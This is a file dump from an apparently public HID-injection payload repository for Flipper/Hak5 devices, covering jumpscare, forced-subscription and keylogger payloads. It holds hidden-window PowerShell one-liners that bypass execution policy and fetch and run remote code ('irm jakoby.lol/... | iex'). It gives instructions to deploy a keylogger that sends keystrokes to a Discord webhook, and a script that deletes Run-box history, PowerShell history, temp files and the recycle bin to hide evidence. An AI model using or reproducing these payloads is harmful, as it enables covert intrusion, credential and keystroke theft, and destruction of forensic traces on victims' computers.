\r\n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\r\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\r\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \r\n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \r\n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \r\n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\r\n############################################################################################################################################################\r\n\r\n<#\r\n.NOTES\r\n\tThis script can be run as is with the provided execution file\r\n.DESCRIPTION \r\n\tThis script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level\r\n\tUpon running this script it will immediately pause after the downloads until a mouse movement is detected \r\n\tThe capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready \r\n\tAfter a mouse movement is detected their wallpaper will change to the scary image provided and the scream sound effect will play\r\n#>\r\n\r\n############################################################################################################################################################\r\n\r\n# Download Image; replace link to $image to add your own image\r\n\r\n$image = \"https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png\"\r\n\r\n$i = -join($image,\"?dl=1\")\r\niwr $i -O $env:TMP\\i.png\r\n\r\niwr https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png?dl=1 -O $env:TMP\\i.png\r\n\r\n# Download WAV file; replace link to $wav to add your own sound\r\n\r\n$wav = \"https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-JumpScare/female_scream.wav?raw=true\"\r\n\r\n$w = -join($wav,\"?dl=1\")\r\niwr $w -O $env:TMP\\s.wav\r\niwr \"https://jakoby.lol/hak5\" -EA 0 >$null\r\n\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis will take the image you downloaded and set it as the targets wall paper\r\n#>\r\n\r\nFunction Set-WallPaper {\r\n \r\n<#\r\n \r\n .SYNOPSIS\r\n Applies a specified wallpaper to the current user's desktop\r\n \r\n .PARAMETER Image\r\n Provide the exact path to the image\r\n \r\n .PARAMETER Style\r\n Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)\r\n \r\n .EXAMPLE\r\n Set-WallPaper -Image \"C:\\Wallpaper\\Default.jpg\"\r\n Set-WallPaper -Image \"C:\\Wallpaper\\Background.jpg\" -Style Fit\r\n \r\n#>\r\n\r\n \r\nparam (\r\n [parameter(Mandatory=$True)]\r\n # Provide path to image\r\n [string]$Image,\r\n # Provide wallpaper style that you would like applied\r\n [parameter(Mandatory=$False)]\r\n [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]\r\n [string]$Style\r\n)\r\n \r\n$WallpaperStyle = Switch ($Style) {\r\n \r\n \"Fill\" {\"10\"}\r\n \"Fit\" {\"6\"}\r\n \"Stretch\" {\"2\"}\r\n \"Tile\" {\"0\"}\r\n \"Center\" {\"0\"}\r\n \"Span\" {\"22\"}\r\n \r\n}\r\n \r\nIf($Style -eq \"Tile\") {\r\n \r\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force\r\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name TileWallpaper -PropertyType String -Value 1 -Force\r\n \r\n}\r\nElse {\r\n \r\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force\r\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name TileWallpaper -PropertyType String -Value 0 -Force\r\n \r\n}\r\n \r\nAdd-Type -TypeDefinition @\" \r\nusing System; \r\nusing System.Runtime.InteropServices;\r\n \r\npublic class Params\r\n{ \r\n [DllImport(\"User32.dll\",CharSet=CharSet.Unicode)] \r\n public static extern int SystemParametersInfo (Int32 uAction, \r\n Int32 uParam, \r\n String lpvParam, \r\n Int32 fuWinIni);\r\n}\r\n\"@ \r\n \r\n $SPI_SETDESKWALLPAPER = 0x0014\r\n $UpdateIniFile = 0x01\r\n $SendChangeEvent = 0x02\r\n \r\n $fWinIni = $UpdateIniFile -bor $SendChangeEvent\r\n \r\n $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)\r\n}\r\n \r\n#----------------------------------------------------------------------------------------------------\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis is to pause the script until a mouse movement is detected\r\n#>\r\n\r\nfunction Pause-Script{\r\nAdd-Type -AssemblyName System.Windows.Forms\r\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\r\n$o=New-Object -ComObject WScript.Shell\r\n\r\n while (1) {\r\n $pauseTime = 3\r\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\r\n break\r\n }\r\n else {\r\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\r\n }\r\n }\r\n}\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n<#\r\n\r\n.NOTES \r\n\tThis is to play the WAV file\r\n#>\r\n\r\nfunction Play-WAV{\r\n$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation=\"$env:TMP\\s.wav\";$PlayWav.playsync()\r\n}\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n\r\n# This turns the volume up to max level\r\n$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n\r\nPause-Script\r\nSet-WallPaper -Image \"$env:TMP\\i.png\" -Style Center\r\nPlay-WAV\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis is to clean up behind you and remove any evidence to prove you were there\r\n#>\r\n\r\n# Delete contents of Temp folder \r\n\r\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\r\n\r\n# Delete run box history\r\n\r\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\r\n\r\n# Delete powershell history\r\n\r\nRemove-Item (Get-PSreadlineOption).HistorySavePath\r\n\r\n# Deletes contents of recycle bin\r\n\r\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n\r\n# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off\r\n\r\nAdd-Type -AssemblyName System.Windows.Forms\r\n$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')\r\n\r\n#If true, toggle CapsLock key, to ensure that the script doesn't fail\r\nif ($caps -eq $true){\r\n\r\n$key = New-Object -ComObject WScript.Shell\r\n$key.SendKeys('{CapsLock}')\r\n}\r\n" }, { "path": "Payloads/Flip-JumpScare/JumpScare.txt", "content": "REM Title: JumpScare\r\n\r\nREM Author: I am Jakoby\r\n\r\nREM Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details\r\n\r\nREM Target: Windows 10, 11\r\n\r\nREM Start by minimizing all their current windows\r\nGUI m\r\nDELAY 500\r\n\r\nREM Remember to replace the link with your link for the intended file to download if you are using a custom variation of this payload\r\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\r\n\r\nREM --------------------------------------------------------------------------------------\r\nREM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.\r\nREM --------------------------------------------------------------------------------------\r\n\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex\r\nENTER\r\n" }, { "path": "Payloads/Flip-JumpScare/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# JumpScare\n\nA script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.\n\n## Description\n\nThis script starts off using Invoke-WebRequests to download both an Image and Sound file.\nTheir system volume is then turned up to the max level.\nThe script will be paused until a mouse movement is detected.\nAt that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played.\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\nArf\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n* [0iphor13](https://github.com/0iphor13)\n* [PhilSutter](https://github.com/PhilSutter)\n\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-JumpScare-2.0/JumpScare2.0.txt", "content": "REM Title: JumpScare 2.0\nREM Author: I am Jakoby\nREM Description: This is a one liner payload that will execute and wait until a mouse movement is detected and do a jumpscare\nREM Target: Windows 10, 11\n\nREM --------------------------------------------------------------------------------------\nREM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.\nREM --------------------------------------------------------------------------------------\n\nDELAY 2000\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Ep Bypass $D=\"$env:tmp\";irm -Uri 'https://jakoby.lol/kiv' -O \"$D\\js.zip\";Expand-Archive \"$D\\js.zip\" -Des $D -Force;. \"$D\\js\\js.ps1\"\nENTER\n" }, { "path": "Payloads/Flip-JumpScare-2.0/ReadMe.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n \n\n

\n \n \n \n

\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# JumpScare 2.0\n\nA script used to jumpscare your target.\n\n## Description\n\nThis script will jumpscare your target.\n\nA jumpscare video will be downloaded to their temp directory. \n\nWhen a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen.\n\n## Getting Started\n\n### Dependencies\n\n* An internet connection\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload\n```\npowershell -w h -NoP -NonI -Ep Bypass $D=\"$env:tmp\";irm -Uri 'https://jakoby.lol/kiv' -O \"$D\\js.zip\";Expand-Archive \"$D\\js.zip\" -Des $D -Force;. \"$D\\js\\js.ps1\"\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n\n

\n \"Github\n

\n" }, { "path": "Payloads/Flip-Keylogger/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Keylogger \n\nThis is a Powershell based keylogger that exfiltrates the logs to discord\n\n## Description\n\nQuickly with just ONE line of code you can deploy a keylogger on your targets computer \n\nComplete with custom logging times, and self destruct feature\n\nJust move the `keylogger.txt` file over to your flipper and you are good to go\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* 15 seconds later you have their keystrokes being sent to you\n\nThis is the basic command to install the keylogger and provide the webhook for the keystrokes to be sent back to you\n\n* `$dc=''` is the variable where you plug in your discord webhook \n\n```\npowershell -w h -NoP -Ep Bypass $dc='https://link.iamjakoby.com/xxxx';iwr \"https://jakoby.lol/m2m\" | iex\n```\n### ADDITIONAL PARAMETERS\n\nThe payload is set to send the logs collected every hour on the hour\n\n* You maybe use the `$log` variable to specify a certain time instead (Use this for testing)\n* ex: `$log=\"09:00 pm\"` <-- This will send the log every night at 9pm\n\nYou also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date \n\n`$ks=\"12/25/2022 10:00:00 PM\"` <-- This will make the keylogger self delete at 10pm on December 25th\n\nCalling the script with both a `log` time and `killswitch` will look something like this: \n \n```\npowershell -w h -NoP -Ep Bypass -command \"$dc='https://link.iamjakoby.com/xxxx';$log='09:00 pm';$ks='12/25/2022 10:00:00 PM';iwr 'https://jakoby.lol/m2m' | iex\"\n```\n### DELETING THE KEYLOGGER\n\nJust hold `Left Control` + `Right Control` for 5 seconds untill the notification box pops up\n\n\"C#\"\n\n\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n\n" }, { "path": "Payloads/Flip-Keylogger/keylogger.ps1", "content": "$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"This payload has been detected by Microsoft. An updated undetected version will be released as soon as possible\",10)\n" }, { "path": "Payloads/Flip-Keylogger/keylogger.txt", "content": "REM Title: Keylogger\n\nREM Author: I am Jakoby\n\nREM Description: This is a Powershell based keylogger that exfiltrates the logs to discord\n\nREM Target: Windows 10, 11\n\nREM ADDITIONAL PARAMETERS\nREM The payload is set to send the logs collected every hour on the hour\n\nREM You maybe use the $log variable to specify a certain time instead (Use this for testing)\nREM ex: $log=\"09:00 pm\" <-- This will send the log every night at 9pm\nREM You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date\n\nREM $ks=\"12/25/2022 10:00:00 PM\" <-- This will make the keylogger self delete at 10pm on December 25th\n\nREM Calling the script with both a log time and killswitch will look something like this:\n\nREM $dc='https://link.iamjakoby.com/xxxx';$log=\"09:00 pm\";$ks=\"12/25/2022 10:00:00 PM\";iwr \"https://jakoby.lol/m2m\" | iex\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -Ep Bypass -command \"$dc='https://link.iamjakoby.com/xxxx';$log='';$ks='';iwr 'https://jakoby.lol/m2m' | iex\"\nENTER\n" }, { "path": "Payloads/Flip-MustSub/MustSub-Execute.txt", "content": "REM Title: MustSub\nREM Author: I am Jakoby\nREM Description: This payload is used to get your target to subscribe to 15 of my favorite hacker youtube channels\nREM Target: Windows 10, 11\nREM --------------------------------------------------------------------------------------\nREM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.\nREM --------------------------------------------------------------------------------------\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex\nENTER\n" }, { "path": "Payloads/Flip-MustSub/MustSub.ps1", "content": "$channels = @\"\nhttps://www.youtube.com/iamjakoby\nhttps://www.youtube.com/c/CosmodiumCS\nhttps://www.youtube.com/c/zSecurity\nhttps://www.youtube.com/c/SystemExploited/featured\nhttps://www.youtube.com/c/Lab401\nhttps://www.youtube.com/c/TheCyberMentor\nhttps://www.youtube.com/c/JohnHammond010\nhttps://www.youtube.com/c/MalwareTechBlog\nhttps://www.youtube.com/c/SecurityFWD\nhttps://www.youtube.com/c/Nahamsec\nhttps://www.youtube.com/c/jhaddix\nhttps://www.youtube.com/c/NetworkChuck\nhttps://www.youtube.com/c/DavidBombal\nhttps://www.youtube.com/c/JimBrowning\nhttps://www.youtube.com/user/TechInterpreterInc\n\"@\n\n$URLs = $channels -split \"`n\"\n\nfunction subscribe {\n\n[CmdletBinding()]\nparam (\t\n[Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)]\n[string]$channel\n)\nAdd-Type -AssemblyName System.Windows.Forms\n$o=New-Object -ComObject WScript.Shell\n$url = -join($channel,\"?sub_confirmation=1\")\nStart-Process $url \nStart-Sleep -Seconds 3\n[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)\n[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')\nStart-Sleep -Seconds 1\n[System.Windows.Forms.SendKeys]::SendWait('%{F4}')\nStart-Sleep -Seconds 1\n}\n\nforeach ($channel in $URLs) {subscribe $channel}\n" }, { "path": "Payloads/Flip-MustSub/Readme.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n \n\n

\n \n \n \n

\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Must Sub\n\nA script used to get your target to subscribe to 15 of my favorite hacker YouTube channels. \n\n## Description\n\nThis script will loop through an array of URLs.\n\nEach URL will be passed through the subscribe function.\n\n## Getting Started\n\n### Dependencies\n\n* An internet connection\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload\n```\npowershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n\n

\n \"Github\n

\n" }, { "path": "Payloads/Flip-PS-Draw/Images/images", "content": "images will be stored here\n" }, { "path": "Payloads/Flip-PS-Draw/PS-Custom-Draw.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : PS-CustomDraw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Prank | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 7,10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n\n<#\n.NOTES\n\tThis script uses the provided arrays to generate images. You also have the ability to make your own if you so choose. \n\tTo increase the size of the pixels add more spaces to the following Write-Host command.\n\tWrite-Host \" \" -NoNewline -BackgroundColor $Colors[$position] \n\n.DESCRIPTION \n\tThis program will take the provided arrays and use them to generate images that will be drawn out in a powershell window. \n\n.SYNTAX \n\t$col | PS-Draw\n\t$hak5 | PS-Draw\n\t$omg | PS-Draw\n\tPS-Draw -Image $col\n\tPS-Draw -Image $hak5\n\tPS-Draw -Image $omg\n#>\n############################################################################################################################################################\n\n$Colors = @{\n 1 = 'White' \n 2 = 'Black' \n 3 = 'DarkBlue' \n 4 = 'DarkGreen' \n 5 = 'DarkCyan' \n 6 = 'DarkRed' \n 7 = 'DarkMagenta' \n 8 = 'DarkYellow' \n 9 = 'Gray' \n 10 = 'DarkGray' \n 11 = 'Blue' \n 12 = 'Green' \n 13 = 'Cyan' \n 14 = 'Red' \n 15 = 'Magenta' \n 16 = 'Yellow' \n}\n\n\t\t#Show available colors\n$col = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1), \n @(2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2),\n @(3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3),\n @(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4),\n @(5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5),\n @(6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6),\n @(7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7),\n @(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8),\n @(9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9),\n @(10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10),\n @(11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11),\n @(12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12),\n @(13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13),\n @(14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14),\n @(15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15),\n @(16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16)\n\n\n$omg = @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1), \n @(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),\n @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),\n @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),\n @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),\n @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),\n @(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),\n @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),\n @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),\n @(2,2,1,1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,1,1,1,1),\n @(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),\n @(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),\n @(2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2),\n @(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),\n @(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),\n @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),\n @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),\n @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),\n @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),\n @(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),\n @(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),\n @(2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2),\n @(2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2),\n @(2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2),\n @(2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,2)\n\n\n$hak5 = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1), \n @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),\n @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),\n @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,1),\n @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1),\n @(1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,6,6,6,6,6,6,6,6,6,6,6,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,1,2,2,1,6,6,6,6,6,6,6,6,6,6,6,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,2,2,1,1,6,6,6,6,1,1,1,6,6,6,6,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,2,2,2,2,1,1,1,2,2,2,2,2,1,1,1,6,6,6,1,1,1,1,6,6,6,6,1),\n @(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,2,1,1,2,2,1,1,2,2,2,2,2,1,1,1,1,1,1,1,1,1,6,6,6,6,6,1),\n @(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,2,6,6,6,6,6,1,1,6,6,6,6,6,1,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,6,1,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,2,1,1,1,1,2,2,2,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,1,1,1),\n @(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,6,1,1,1),\n 